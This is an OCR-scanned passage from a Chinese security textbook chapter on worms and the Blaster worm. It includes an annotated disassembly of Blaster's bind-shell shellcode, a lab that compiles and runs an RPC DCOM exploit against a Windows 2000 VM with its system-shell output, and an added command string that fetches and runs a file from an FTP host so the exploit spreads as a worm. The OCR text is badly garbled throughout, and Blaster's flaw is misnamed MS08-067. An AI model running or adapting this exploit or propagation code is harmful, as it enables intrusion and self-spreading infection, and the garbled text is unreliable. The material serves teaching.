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的 情况 下 就 能 激活 病毒 ,而 此 前 即便 是 很 多 防 病毒 专家 也 一 直 认为 , 带 有 病毒 附件 的 邮件 ， 
只 要 不 去 打开 附件 ,病毒 就 不 会 有 危害 。 “红色 代码 ?是 利用 了 微软 IIS 服务 器 软件 的 漏洞 
(idq. dll 远程 缓存 区 溢出 ) 来 传播 的 “SQL 蠕虫 王 ? 病 毒 则 是 利用 了 微软 的 数据 库 系统 的 一 
个 漏洞 进行 大 肆 攻 击 。 

2. 与 黑客 技术 相 结合 

以 “红色 代码 ”为 例 , 感 染 后 计算 机 的 Web 目录 的 scripts 下 将 生成 一 个 root. exe, 可 以 
远程 执行 任何 命令 ,从 而 使 黑客 能 够 再 次 进入 。 

3. 传染 方式 多 

蠕虫 病毒 的 传染 方式 比较 复杂 ,可 利用 的 传播 途径 包括 文件 .电子 邮件 、Web 服务 器 、 
Web 脚本 、U 盘 和 网 络 共享 等 。 

4. 传播 速度 快 

在 单机 上 ,病毒 只 能 通过 被 动 方法 (如 复制 、 下 载 .共享 等 ) 从 一 台 计 算 机 扩散 到 另 一 台 
计算 机 。 而 在 网 络 中 则 可 以 通过 网 络 通信 机 制 ,借助 高 速 电缆 进行 迅速 扩散 。 由 于 蠕虫 病 
毒 在 网 络 中 传染 速度 非常 快 ,因此 其 扩散 范围 很 大 。 里 虫 不 但 能 迅速 传染 局 域 网 内 所 有 计 
算 机 ,还 能 通过 远程 工作 站 将 蠕虫 病毒 在 一 瞬间 传播 到 千里 之 外 。 

5. 清除 难度 大 

在 单机 中 ,再 顽固 的 病毒 也 可 通过 删除 带 毒 文件 、 低 级 格式 化 硬盘 等 措施 将 病毒 清除 。 
而 网 络 中 只 要 有 一 台 工 作 站 未 能 将 病毒 查 杀 干 净 就 可 使 整个 网 络 重新 全 部 被 病毒 感染 ,其 
至 刚刚 完成 杀毒 工作 的 一 台 工 作 站 马上 就 能 被 网 上 另 一 台 工 作 站 的 带 毒 程序 所 传染 。 因 
此 ,仅仅 对 单机 进行 病毒 杀 除 不 能 彻底 解决 网 络 蠕虫 病毒 的 问题 。 

6. 破坏 性 强 

网 络 中 蠕虫 病毒 将 直接 影响 网 络 的 工作 状态 , 轻 则 降低 速度 ,影响 工作 效率 , 重 则 造成 
网 络 系统 的 瘫痪 ,破坏 服务 器 系统 资源 ,使 多 年 的 工作 毁 于 一 旦 。 


7.3 蠕虫 病毒 的 机 制 


从 编程 的 角度 来 看 ,蠕虫 病毒 由 两 部 分 组 成 : 主 程序 和 引导 程序 。 主 程序 一 旦 在 计算 
机 中 建立 ,就 可 以 开始 收集 与 当前 计算 机 联网 的 其 他 计算 机 的 信息 。 它 能 通过 读 取 公 共 配 
置 文件 并 检测 当前 计算 机 的 联网 状态 信息 ,尝试 利用 系统 的 缺陷 在 远程 计算 机 上 建立 引导 
程序 。 引 导 程 序 负责 把 “蠕虫 "病毒 带 入 它 所 感染 的 每 一 台 计 算 机 中 。 
主 程序 中 最 重要 的 是 传播 模块 。 传 播 模块 实现 了 自动 和 人 侵 功能 ,这 是 蠕虫 病毒 能 力 的 
最 高 体现 。 传 播 模块 可 以 笼统 地 分 为 扫描 攻击 和 复制 3 个 步骤 。 

(1) 扫描 蠕虫 的 扫描 功能 主要 负责 探测 远程 主机 的 漏洞 ,这 模拟 了 攻防 的 Scan 过 程 。 
当 蠕 虫 向 某 个 主机 发 送 探测 漏洞 的 信息 并 收 到 成 功 的 应 答 后 ,就 得 到 了 一 个 潜在 的 传播 
对 象 。 

(2) 攻击 病毒 按 特 定 漏洞 的 攻击 方法 对 潜在 的 传播 对 象 进行 自动 攻击 ,以 取得 该 主机 
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的 合适 权限 ,为 后 续 步骤 做 准备 。 

(3) 复制 在 特定 权限 下 ,复制 功能 实现 蠕虫 引导 程序 的 远程 建立 工作 , 即 把 引导 程序 复 
制 到 攻击 对 象 上 。 

蠕虫 程序 常 驻 于 一 台 或 多 台 计 算 机 中 ,并 具有 自动 重新 定位 (Auto Relocation) 的 能 力 。 
如 果 它 检测 到 网 络 中 的 某 台 计算 机 未 被 占用 , 它 就 把 自身 的 一 个 复制 发 送 给 那 台 计算 机 。 
每 个 程序 段 都 能 把 自身 的 复制 重新 定位 于 另 一 台 计算 机 中 ,并 且 能 够 识别 出 它 自 己 所 占用 
的 计算 机 。 

最 早 的 蠕虫 病毒 是 针对 IRC 的 蠕虫 程序 。 这 类 病毒 在 20 世纪 90 年 代 早期 曾经 广泛 
流行 ,但 是 随 着 即时 聊天 系统 的 普及 和 基于 浏览 器 的 阅读 方式 逐渐 成 为 交流 的 主要 方式 ,这 
种 病毒 出 现 的 机 会 也 就 越 来 越 小 了 。 

当前 流行 的 蠕虫 病毒 主要 采用 一 些 已 公开 的 漏洞 ,脚本 以 及 电子 邮件 等 进行 传播 。 


7.4 基于 RPC 漏洞 的 蠕虫 


本 节 主 要 研究 冲击 波 病 毒 如 何 利用 微软 RPC 漏洞 获取 目标 机 器 最 高 权限 ,并 且 深 入 了 
解 冲击 波 这 种 蠕虫 的 攻击 模式 ,以 及 学 习 Shell 以 及 Socket 编程 原理 。 


7.4.1 RPC 漏洞 


远程 过 程 调用 (Remote Procedure Call, RPC) 是 Windows 操作 系统 使 用 的 一 个 协议 。 
RPC 提供 了 一 种 进程 间 通 信 机 制 , 通 过 这 一 机 制 , 在 一 台 计 算 机 上 运行 的 程序 可 以 顺畅 地 
执行 某 个 远程 系统 上 的 代码 。 该 协议 本 身 是 从 OSF( 开 放 式 软件 基础 )RPC 协议 衍生 出 来 
的 ,只 是 增加 了 一 些 Microsoft 特定 的 扩展 。 

RPC 中 处 理 通过 TCP/IP 的 消息 交换 的 部 分 有 一 个 漏洞 。 此 问题 是 由 错误 地 处 理 格 
式 造成 的 。 当 存在 RPC 远程 执行 漏洞 (MS08-067) 的 系统 收 到 攻击 者 构造 的 RPC 请 求 时 ， 
可 能 允许 远程 执行 恶意 代码 ,引起 安装 程序 、 查 看 或 更 改 、 删 除数 据 或 者 是 建立 系统 管理 员 
权限 的 账户 等 ,而 无 须 通 过 认证 。 在 Windows 2000、Windows XP 和 Windows Server 2003 
系统 中 ,利用 这 一 漏洞 ,攻击 者 可 以 通过 恶意 构造 的 网 络 包 直 接 发 起 攻击 ,无 须 通 过 认证 地 
运行 任意 代码 ,并 且 获取 完整 的 权限 。 

这 种 特定 的 漏洞 影响 分 布 式 组 件 对 象 模型 (DCOM) 与 RPC 间 的 一 个 接口 ,此 接口 侦 听 
TCP/IP 端口 135。 为 利用 此 漏洞 ,攻击 者 可 能 需要 向 远程 计算 机 上 的 135 端口 发 送 特殊 格 
式 的 请 求 。 

已 经 发 现 一 些 程序 存在 此 类 漏洞 ,Samba 是 一 套 实 现 SMB(Server Messages Block) 协 
议 跨 平台 进行 文件 共享 和 打印 共享 服务 的 程序 。Samba 在 处 理 用 户 数据 时 存在 输入 验证 
漏洞 ,远程 攻击 者 可 能 利用 此 漏洞 在 服务 器 上 执行 任意 命令 。 

Samba 中 负责 在 SAM 数据 库 更 新 用 户口 令 的 代码 未 经 过 滤 便 将 用 户 输入 传输 给 了 
/bin/sh。 如 果 在 调用 smb. conf 中 定义 的 外 部 脚本 时 ,通过 对 /bin/sh 的 MS-RPC 调用 提 
交 了 恶意 输入 的 话 , 就 可 能 允许 攻击 者 以 nobody 用 户 的 权限 执行 任意 命令 。 
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7.4.2 冲击 波 病 毒 


2003 年 7 月 16 日 .微软 公司 发 布 T“RPC 接口 中 的 缓冲 区 溢出 ”的 漏洞 补丁 。 该 漏洞 
存在 于 RPC 中 处 理 通 过 TCP/IP 的 消息 交换 的 部 分 ,攻击 者 通过 TCP 135 端口 ,向 远程 计 
算 机 发 送 特殊 形式 的 请 求 ,允许 攻击 者 在 目标 机 器 上 获得 完全 的 权限 并 且 可 以 执行 任意 的 
代码 。 

恶意 代码 制造 者 迅即 抓 住 了 这 一 机 会 ,首先 制作 出 了 一 个 利用 此 漏洞 的 蠕虫 。 俄 罗斯 
著名 反 病 毒 厂商 Kaspersky Labs 于 2003 年 8 月 4 日 捕获 了 这 个 恶意 代码 ,并 发 布 了 命名 
为 Worm. Win32. Autorooter 恶意 代码 的 信息 ,也 就 是 “冲击 波 ”。 在 短 短 几 周 的 时 间 里 ,就 
导致 了 大 量 网 络 瘫痪 ,造成 了 数 十 亿美 元 的 损失 。“ 冲 击 波 ” 的 攻击 行为 如 下 。 

(1) 冲击 波 运行 时 会 将 自身 复制 到 window 目录 下 ,并 命名 为 msblast. exe。 

(2) 冲击 波 运 行 时 会 在 系统 中 建立 一 个 名 为 BILLY 的 互 斥 量 , 目 的 是 冲击 波 只 保证 在 
内 存 中 有 一 份 副本 ,为 了 避免 用 户 发 现 。 

(3) 冲击 波 运行 时 会 在 内 存 中 建立 一 个 名 为 msblast. exe 的 进程 ,该 进程 就 是 活 的 病毒 体 。 

(4) 冲击 波 会 修改 注册 表 ,在 


HKEY_LOCAL_ MACHINE\SOFTHARE\Microsoft\Windows\CurrentVersion\Run 


中 添加 键 值 


"windows auto update" = "msblast. exe" 


这 样 就 可 以 保证 每 次 启动 系统 时 ,冲击 波 都 会 自动 运行 。 

(5) 冲击 波 体内 隐藏 有 一 段 文本 信息 : I just want to say LOVE YOU SAN!! Billy 
gates why do you make this possible ? Stop making money and fix your software!! 

(6) 冲击 波 会 以 20s 为 间隔 ,每 20s 检测 一 次 网 络 状 态 , 当 网 络 可 用 时 ,冲击波 会 在 本 
地 的 UDP/69 端口 上 建立 一 个 tftp 服务 器 ,并 启动 一 个 攻击 传播 线程 ,不 断 地 随机 生成 攻 
击 地 址 ,进行 攻击 。 另 外 该 病毒 攻击 时 ,会 首先 搜索 子 网 的 IP 地 址 ,以 便 就 近 攻 击 。 

(7) 当 冲 击 波 扫描 到 计算 机 后 ,就 会 向 目标 计算 机 的 TCP135 端口 发 送 攻 击 数据 。 

(8) 当 冲 击 波 攻击 成 功 后 , 便 会 监听 目标 计算 机 的 
TCP4444 端口 作为 后 门 ,并 绑 定 cmd. exe。 然 后 蠕虫 会 
连接 到 这 个 端口 ,发送 TFTP 命令 , 回 连 到 发 起 进攻 的 
主机 ,将 msblast. exe 传 到 目标 计算 机 上 并 运行 。 


(9) 当 冲击 波 攻击 失败 时 ,可 能 会 造成 没有 打 补丁 SS 
的 Windows 系统 RPC 服务 崩溃 (图 7-1), Windows XP 3 汪 o 提 和 


系统 可 能 会 自动 重启 计算 机 。 该 蠕虫 不 能 成 功 攻击 
Windows Server 2003, 但 是 可 以 造成 Windows Server 
2003 系统 的 RPC 服务 崩溃 ,默认 情况 下 是 系统 反复 图 7-1 冲击 波 的 中 毒 症状 
重启 。 

(10) 冲击 波 检测 到 当前 系统 月 份 是 8 月 之 后 或 者 日 期 是 15 日 之 后 ,就 会 向 微软 的 更 
新 站 点 发 动 拒绝 服务 攻击 ,使 微软 网 站 的 更 新 站 点 无 法 为 用 户 提供 服务 。 


:00401028 E847010000 
:0040102D 8906 
:0040102F FF36 
:00401031 688E4EOEEC 
:00401036 E861010000 
:0040103B 894608 
:0040103E FF36 
:00401040 68ADD905CE 


:00401045 E852010000 
:0040104A 89460C 
:0040104D 686C6C0000 
:00401052 6833322E64 
:00401057 687773325F 
:0040105C 54 
:0040105D FF5608 
:00401060 894604 


:00401063 FF36 
:00401065 6872FEB316 
:0040106A E82D010000 
:0040106F 894610 
:00401072 FF36 
:00401074 687ED8E273 
:00401079 E81E010000 
:0040107E 894614 
:00401081 FF7604 
:00401084 68CBEDFC3B 
:00401089 E80E010000 
:0040108E 894618 
:00401091 FF7604 
:00401094 68D909F5AD 
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7.4.3 冲击 波 的 shellcode 分 析 

:00401000 90 nop 

:00401001 90 nop 

:00401002 90 nop 

:00401003 EB19 jmp 0040101E 

:00401005 5E pop esi ;esi= 00401023, 从 00401023 地 址 开 
; 始 的 代码 将 要 被 还 原 , 实际 上 esi 
;指向 的 地 址 在 堆栈 中 是 不 固定 的 

:00401006 31C9 XOr ecx, ecx 

:00401008 81E989FFFFFF sub ecx, FFFFFF89== 一 77 ;ecx= 77h 

:0040100E 813680BF3294 xor dword ptr [esi]，9432BF80 ;还 原 从 00401023 开始 被 加 密 的 代码 

:00401014 81EEFCFFFFFF Sub esi, FFFFFFFC jadd esi,4 

:0040101A E2F2 loop 0040100E 

:0040101C EB05 jmp 00401023 ;还 原 已 完成 , 跳 到 被 还 原 的 代码 处 执行 

:0040101E E8E2FFFFFF call 00401005 ;这 条 指令 相当 于 push 00401023, jmp 
;00401005 两 条 指令 的 集合 

;此 处 开始 的 代码 已 被 还 原 : 

:00401023 83EC34 sub esp, 00000034 

:00401026 8BF4 mov esi, esp ;esi -> 变量 表 


call 00401174 
mov dword ptr [esi], eax 


;eax = 77e40000h = hkerne132 


push dword ptr [esi] ;=77e40000h 

push ECOEAEB8E ;LoadLibraryA 字符 串 的 自 定 义 编码 
call 0040119C 

mov dword ptr [esi+08], eax ;=77e605d8h 

push dword ptr [esi] ;=77e40000h 

push CE05D9RD ;WaitForSingleObject 字符 串 的 自 定 

; 义 编码 
call 0040119C 
mov dword ptr [esi+0C], eax ;=77e59d5bh 


push 00006C6C 


push 642E3233 
push 5F327377 ; "ws2_32.d11" 
push esp jesp 一 ->"ws2_32.dl11" 


call LoadLibraryA -一 > ws2_32.dl1 
mov dword ptr [esi+04]，eax ;=71a20000h(ws2_32.dll 在 内 存 里 


;的 地 址 ) 
push dword ptr [esi] ;=77e40000h 
push 16B3FE72 ;CreateProcessA 字符 串 的 自 定 义 编码 
call 0040119C 
mov dword ptr [esi+10], eax 
push dword ptr [esi] ;=77e40000h 
push 73E2D87E ;ExitProcess 字符 串 的 自 定 义 编码 
call 0040119C 
mov dword ptr [esi+ 14]，eax 
push [esi+ 04] ; = 71a20000h 
Push 3BFCEDCB ;RSaStartup 字符 串 的 自 定 义 编码 
call 0040119C 
mov dword ptr [esi+18], eax 
push [esi+ 04] ;=71a20000h 
push ADF509D9 ;WSASocketA 字符 串 的 自 定义 编码 


:004010EA 6801010000 
:004010EF FF5618 
:004010F2 50 
:004010F3 50 
:004010F4 50 
:004010F5 50 
:004010F6 40 
:004010F7 50 
:004010F8 40 
:004010F9 50 
:004010FA FF561C 
:004010FD 8BD8 
:004010FF 57 
:00401100 57 
:00401101 680200115C 
:00401106 8BCC 
:00401108 6A16 
:0040110A 51 
:0040110B 53 
:0040110C FF5620 
:0040110F 57 
:00401110 53 
:00401111 FF5624 
:00401114 57 
:00401115 51 
:00401116 53 
:00401117 FF5628 


:0040111A 8BD0 


push 00000101 
call WSAStartup 
push eax= 0 

push eax= 0 

push eax= 0 

push eax= 0 

inc eax=1 

push eax=1 

inc eax=2 

push eax=2 

call WSASocketA 
mov ebx, eax = 010ch 
push edi=0 

push edi=0 

push 5C110002 ;port = 4444 
mov ecx, esp 
push 00000016h 
push ecx 

push ebx 

call bind 

push edi=0 

push ebx 

call listen 

push edi=0 

push ecx = 0a2340 
push ebx 

call accept 
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:00401099 E8FE000000 call 0040119C 
:0040109E 89461C mov dword ptr [esi+1C], eax 
:004010A1 FF7604 push [esi+04 ;= 71a20000h 
:004010A4 68A41A70C7 push C7701AA4 ;bind 字符 串 的 自 定义 编码 
:004010A9 E8EE000000 call 0040119C 
:004010AE 894620 mov dword ptr [esi+20], eax 
:004010B1 FF7604 push [esi+ 04 ;=71a20000h 
:004010B4 68A4AD2EE9 push E92EADA4 ;listen 字符 串 的 自 定 义 编码 
:004010B9 E8DE000000 call 0040119C 
:004010BE 894624 mov dword ptr [esi+24], eax 
:004010C1 FF7604 push [esi+ 04 ;= 71a20000h 
:004010C4 68E5498649 push 498649E5 ;accept 字符 串 的 自 定义 编码 
:004010C9 E8CE000000 call 0040119C 
:004010CE 894628 mov dword ptr [esi+28], eax 
:004010D1 FF7604 push [esi+ 04 ;= 71a20000h 
:004010D4 68E779C679 push 79C679E7 ;closesocket 字符 串 的 自 定 义 编码 
:004010D9 E8BE000000 call 0040119C 
:004010DE 89462C mov dword ptr [esi+2C], eax 
:004010E1 33FF xor edi, edi 
:004010E3 81EC90010000 sub esp, 00000190 ;在 堆栈 里 分 配 临时 空间 0x190 字 节 
:004010E9 54 push esp 


iwsock 1,1 
;启动 WINSOCK 1.1 库 


iesp——>2,1,0,0,0,0 
;建立 用 于 监听 的 TCP SOCKET 


;sockaddr_in 结构 没有 填 好 , 少 了 4 字 节 
;ecx——>0200115c0000000000000000 
;这 个 参数 应 该 是 10h 
;ecx——>0200115c000000000000000 
;hsocket 

; 绑 定 4444 端口 


;hsocket 
;4444 端口 开始 进入 监听 状态 


;这 个 参数 好 像 有 问题 , 可 能 是 0 
;hsocket 

;接受 攻击 主机 的 连接 ,开始 接收 对 方 传 
;来 的 DOS 命令 


mov edx, eax = 324h, handle of socket to translate 
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:0040111C 6865786500 push 00657865 

:00401121 68636D642E push 2E646D63 ; "Cmd. exe" 

:00401126 896630 mov dword ptr [esi+ 30]，esp -一 >"cmd. exe" 
PROCESS_INFORMATION STRUCT 

hProcess DWORD ? 

hThread DWORD ? 

dwProcessId DWORD ? 

dwThreadId DWORD ? 


PROCESS_INFORMATION ENDS 
STARTUPINEO STRUCT 


00 cb DWORD ? ;44h 

04 lpReserved DWORD ? 

08 lpDesktop DWORD ? 

0c lpTitle DWORD ? 

10 dwX DWORD ? 

14 dwY DWORD ? 

18 dwXSize DWORD ? 

lc dwYSize DRORD ? 

20 dwXCountChars DWORD ? 

24 dwYCountChars DWORD ? 

28 dwFillAttribute DRORD ? 

2c dwFlags DWORD ? ;100h, set STARTF USESTDHANDLES flags 

30 wShowWindow WORD ? 

32 cbReserved2 WORD ? 

34 lpReserved2 DWORD ? 

38 hStdInput DWORD ? ;hsocket 

3c hStdOutput DWORD ? ;hsocket 

40 hStdError DWORD ? ;hsocket 

STARTUPINFO ENDS 

valve of dwFlags: 

STARTF_USESHOWWINDOW equ lh 

STARTEF_USESIZE equ 2h 

STARTF_USEPOSITION equ 4h 

STARTE_USECOUNTCHARS equ 8h 

STARTF_USEFILLATTRIBUTE equ 10h 

STARTF_RUNFULLSCREEN equ 20h 

STARTF_FORCEONFEEDBACK equ 40h 

STARTF_FORCEOFFFEEDBACK equ 80h 

STARTF_USESTDHANDLES equ 100h 

:00401129 83EC54 sub esp, 00000054 = sizeof STARTUPINFO(10h) + 
Sizeof PROCESS INFOMATION(44h) 

:0040112C 8D3C24 lea edi, dword ptr [esp] 

:0040112F 33C0 XOT eax, eax 

:00401131 33C9 XOr eCx, ecx 

:00401133 83C115 add ecx, 00000015 ;ecx= 15h 

:00401136 AB stosd ;临时 内 存 清 零 , 完 成 后 EDI ->"cmd. 

;exe" 
:00401137 E2FD loop 00401136 
:00401139 C644241044 mov [esp + 10], 44 ;sizeof PROCESS INFOMATION 


:0040113E FE44243D inc [esp+3D=3C+1] ;0->1 ;dwFlags= 0100h 
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:00401142 89542448 
:00401146 8954244C 
:0040114A 89542450 


mov dword ptr [esp + 48], edx= hsocket = 324 ;hStdInput 
mov dword ptr [esp + 4C], edx = hsocket = 324 ;hStdOutput 
mov dword ptr [esp + 50], edx = hsocket = 324 ;hStdError 


填充 STRRTUPINEO 结构 的 字段 ,使 cmd. exe 的 Input, 0utput, Error 都 指向 hsocket, 所 以 hsocket 收 到 
的 tftp -i xx. xx, xx. xx get msblast. exe ,start msblast. exe 和 msblast. exe 字符 串 数 据 都 作为 输入 
cmd. exe 的 D0S 命令 执行 ,也 就 是 通信 socket 和 cmd. exe 绑 定 在 一 起 . 


:0040114E 8D442410 
:00401152 54 
:00401153 50 
:00401154 51 
:00401155 51 
:00401156 51 
:00401157 6A01 


:00401159 51 
:0040115A 51 
:0040115B FF7630 
:0040115E 51 
:0040115F FF5610 


:00401162 8BCC 
:00401164 6AFF 


:00401166 FF31 
:00401168 FF560C 


:0040116B 8BC8 


:0040116D 57 
:0040116E FF562C 


:00401171 FF5614 


lea eax, dword ptr [esp+10] 
push esp -一 > retval save to PROCESS INFOMATION struct 
push eax -一 > STARTUPINFO struct 


push ecx=0 ;path 

push ecx=0 ;temp var 

push ecx=0 ;flag 

push 00000001 ;允许 当前 进程 中 的 所 有 句柄 都 由 新 建 的 子 
;进程 继承 


push ecx=0 

push ecx=0 

push [esi+30] -->"cmd. exe" 

push ecx=0 

call CreateProcessA =1 ;建立 cmd. exe 进程 ,从 hsocket 接收 input， 
;output 

mov ecx, esp ——>4403000048030000e8030000e4030000, 44h, 15 dup(0) 

ecx -一 > hProcess = 344, hThread = 348, dwProcessID = 3e8, dwThreadID = 3e4 

push FFFFFFFF = INFINITE 

push dword ptr [ecx] ;hProcess = 0344 

call WaitForSingleObject ;无 限 等 待 cmd. exe, 接收 攻击 主机 传 来 在 被 
;攻击 主机 的 cmd. exe 里 执行 的 DOS 命令 : 
;tftp — i xx. xx. xx. xx get msblast. exe 和 


;start msblast. exe, 把 病毒 体 下 载 到 被 攻击 


; 自 带 的 GET KERNEL32 模块 BASE 的 子 程式 


:00401174 55 
:00401175 56 


;主机 并 马上 运行 病毒 

mov ecx, eax =0 ;CMD 进程 退出 后 WaitForSingle0bject 返回 
;这 里 继续 运行 

push edi 一 一 >"cmd. exe" 

call closesocket ;这 里 好 像 有 错误 ,参数 应 该 是 hsocket, 而 不 
;是 edi 

call ExitProcess ;退出 svchost. exe 进程 , 倒 记 时 60s 重新 启动 

push ebp 

push esi 


:00401176 64A130000000mov eax, dword ptr fs:[00000030] 


:0040117C 85C0 
:0040117E 780C 
:00401180 8B400C 
:00401183 8B701C 
:00401186 AD 
:00401187 8B6808 
:0040118A EB09 
:0040118C 8B4034 


test eax, eax 

js 0040118C 

mov eax, dword ptr [eax+ 0C] 
mov esi, dword ptr [eax+ 1C] 
lodsd 

mov ebp, dword ptr [eax+ 08] 
jmp 00401195 

mov eax, dword ptr [eax+ 34] 


:0040118F 8BA8B8000000 mov ebp, dword ptr [eax+ 000000B8] 


:00401195 8BC5 


mov eax, ebp 
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:00401197 5E 
:00401198 5D 
:00401199 C20400 


pop esi 
Pop ebp 
ret 0004 ; 自 带 的 GetProcAddress 子 程式 


* Referenced by a CALL at Addresses: 
:00401036 ，:00401045 ，:0040106A ，:00401079 ，:00401089 


:0040119C 53 
:0040119D 55 
:0040119E 56 
:0040119F 57 
:004011A0 8B6C2418 
:004011A4 8B453C 
:004011A7 8B540578 
:004011AB 03D5 
:004011AD 8B4A18 
:004011B0 8B5A20 
:004011B3 03DD 
:004011B5 E332 
:004011B7 49 
:004011B8 8B348B 
:004011BB 03F5 
:004011BD 33FF 
:004011BF FC 
:004011C0 33C0 
:004011C2 AC 
:004011C3 3AC4 
:004011C5 7407 
:004011C7 C1CF0D 
:004011CA 03F8 
:004011CC EBF2 
:004011CE 3B7C2414 
:004011D2 75E1 
:004011D4 8B5A24 
:004011D7 03DD 
:004011D9 668B0C4B 
:004011DD 8B5A1C 
:004011E0 03DD 
:004011E2 8B048B 
:004011E5 03C5 
:004011E7 EB02 
:004011E9 33C0 
:004011EB 8BD5 
:004011ED 5F 
:004011EE 5E 
:004011EF 5D 
:004011F0 5B 
:004011F1 C20400 


push ebx 

push ebp 

push esi 

push edi ;esp——> edi,esi, ebp, ebx, eip, API name, hModule 
mov ebp, dword ptr [esp+ 18] =module base 

mov eax dword ptr [ebp+ 3C] = PE head 

mov edx，dword ptr [ebp + eax+ 78] = outport table 


add edx, ebp ;edx ——> outport table 

mov ecx, dword ptr [edx+ 18] ;num of api 
mov ebx, dword ptr [edx+ 20] jaddr of api name table 
add ebx, ebp 

jcxz 004011E9 

dec ecx 


mov esi, dword ptr [ebx+ 4*x ecx] 
add esi, ebp 

xor edi, edi 

cld 

xor eax, eax 

lodsb 

cmp al, ah 

je 004011CE 

ror edi, 0D 

add edi, eax 

jmp 004011C0 

cmp edi, dword ptr [esp+14] 
jne 004011B5 

mov ebx, dword ptr [edx+ 24] 
add ebx, ebp 

mov Cx, word ptr [ebx+ 2 * ecx] 
mov ebx, dword ptr [edx+ 1C] 
add ebx，ebp 

mov eax dword ptr [ebx+ 4*x ecx] 
add eax, ebp 

jmp 004011EB 

XOr eax, eax 

mov edx, ebp 

Pop edi 

pop esi 

Pop ebp 

pop ebx 

ret 0004 
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7.4.4 冲击 波 实验 


本 实验 采用 利用 RPC DCOM 漏洞 的 shellcode, 在 知道 所 要 攻击 机 器 的 IP 地 址 以 及 机 
器 类 型 ,并 且 没 有 安装 冲击 波 病毒 补丁 的 情况 下 能 够 攻击 成 功 ,可 以 用 来 演示 冲击 波 病 毒 的 
攻击 过 程 。 

1. 实验 环境 

实验 所 需 的 系统 软件 为 : 

VMWare Workstation 7.0.1 

Windows 2000 Advance Server SP1 

虚拟 机 中 操作 系统 : 

攻击 方 Linux(Ubuntu8. 04) 

攻击 对 象 Windows 2000 Advance Server SP1 

实验 素材 : experiments 目录 的 RPC 目录 下 。 

虚拟 机 映像 : vituralmachine 目录 下 的 PRCVM。 

2. 实验 准备 

(1) 环境 安装 。 安 装 虚拟 机 VMWare, 并 在 其 中 分 别 安装 Linux 以 及 Windows 2000 
操作 系统 。 如 果 直 接 下 载 虚拟 机 映像 文件 , 则 可 以 省 去 该 部 分 。 

(2) 源码 准备 。 从 电子 资源 中 复制 病毒 程序 源码 vdcom. c 到 Linux 任意 目录 中 ,之 后 
的 编译 运行 等 工作 都 在 此 目录 中 进行 。 如 果 直 接 下 载 虚拟 机 映像 文件 , 则 源码 已 经 存在 于 
相关 目录 中 。 

(3) 编译 源码 。 使 用 gcc 编译 源码 : gcc -o rpcattack vdcom. c, 生 成 文件 rpcattack ,如 
图 7-2 所 示 。 并 检查 文件 是 否 生 成 。 


ruby@uby-desktop:-/ 文 档 $ 9cc -0 rpcattack vdcom.c 


咏 ps vdcom.c: 在 函数 “main' 中 
HH vdcom.c:369: 血 告 : 内 建 浮 数 “memcpy” 不 兼容 的 隐 式 声明 
rpcattack vdcom.c ruby@ruby-desktop:~/ 文 档 s 有 
图 7-2 编译 源码 
3. 开始 实验 


首先 确保 目标 虚拟 机 Windons 2000 打开 ,并 检查 C 盘 根 目录 下 没有 和 多余 实验 用 文件 。 
然后 运行 病毒 程序 ,输入 /rpcattack, 可 以 看 到 输入 参数 如 图 7-3 所 示 。 

由 于 是 攻击 演示 ,因此 需要 知道 目标 机 器 操作 系统 的 类 型 和 版 本 ,用 以 设置 不 同 的 偏 移 
量 (本 实验 中 目标 机 器 类 型 为 45) 。 

运行 /rpcattack 45 目标 IP 地 址 ,进行 shellcode 的 注入 。 如 果 攻 击 成 功 ,那么 即 可 获得 
目标 机 器 的 管理 员 权 限 ,进行 各 种 操作 ,如 图 7-4 所 示 。 

退出 后 ,检查 目标 机 器 端口 状态 ,可 发 现 135 端口 已 被 关闭 ,如 图 7-5 所 示 。 

4. 扩展 功能 

可 以 开启 FTP 服务 或 者 利用 公共 FTP, 在 Shell 函数 中 添加 两 行 代码 : 
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char * cmd = "cd. .gcd. . &echo open [ftp 的 ip 地 址 ]>> o&echo [用 户 名 ]>> o&echo [密码 ]>> o&echo 
user [用 户 名 ] [密码 ]>> o&echo bin >> ogecho get 
iexplorer. exe >> ogecho bye >> og&ftp — s:o&iexplorer. exe&del ogexit\n"; 


send( sock, cmd, strlen(cmd), 0); 


这 样 就 可 以 在 获取 目标 权限 后 自动 下 载 文件 并 运行 ,完成 蠕虫 病毒 的 自我 复制 、 传 播 等 
功能 ,如 图 7-6 所 示 。 


- Remote DOOM RPC Buffer Overflow Exploit 
- Original code by FlashSky and Benjurry 

- Rewritten by HOM 

- autoroot/worm by volkam 

- Fixed and Beefed by Legion2000 Security Research 
- Usage: ./run <Target ID> <Target IP> 

- Targets: 

-0 Wndows NT SP4 (english) 

-1 Wndows NT SP5 (chineese) 

-2 Wndows NT SP6 (chineese) 

-3 Wndows NT SP6a (chineese) 

-4 Wndows 2000 NOSP (polish) 

-5 Wndows 2000 SP3 (polish) 

-6 Windows 2000 SP4 (spanish) 

-7 Wndows 2000 NOSP1 (english) 

-8 Wndows 2000 NOSP2 (english) 

-9 Wndows 2000 SP2-1 (english) 

- 10 Wndows 2000 SP2-2 (english) 


图 7-3 程序 用 法 


- Renote DOOM RPC Butfer Overtlow Explolt 
- Original code by FlashSky and Benjurry 

- Rewritten by HDM 

autoroot /worm by volkam 

Fixed and Beeted by Legion2000 Security Research 
- Using return address of 0x010016c6 


Dropping to System Shell... 


IMicrosott Wndows 2000 [Version 5.00.2195] 
(C) 人 006 1985-2000 Microsott Corp. 


IC:\WNDOWB\systenB2>cd. .&cd. .8&dir 
ed, .acd 8dir 

00000 C 加 1 仙人 包 你 的 
00000 i 1CAC-8260 


C:\ OR % 

|2010-08-20 12:58 <DIR> Documents and Settings 
|2010-09-09 16:56 <DIR> Inetpub 

|2010-08-20 12:52 <DIR> Program Files 
|2010-09-26 03:19 23,175 test.jpg 

|2010-08-20 13:27 <DIR> WINDOS 


1 00 如 23,175 多 
4 Oh 7,039,184,896 0000 


7-4 成 功 攻击 目标 


201 


Proto 
TCP 
TP 
TCP 
TCP 
TCP 
TCP 
TCP 


-116.132 


116-132 
:116.132 


116.132 


(a) 攻击 前 (b) 攻击 后 


7-5 目标 机 器 攻击 前 后 端口 状态 对 比 


日 
-| 
有 


-7 加 | Q 近 XH SF | 
| 下地 | 本 地 磁盘 (c) 


LISTENING 


| 要 ~ ~ ~ 

| ] | | | 
Documents Inetpub 。 Program Files 。 WINDOWS 
and Settings 


选 定 项 目 可 以 查看 其 说 明 。 


总 计 : 7.98 GB 


加 已 用 空间 : 1.43 G8 


(a) 下 载 前 


9 本 地 磁 盘 (C:) 本 [=]| 
文件 (E) ”编辑 (E) 查看 (W) 收藏 (4) 工具 (T) 帮助 (H) | 
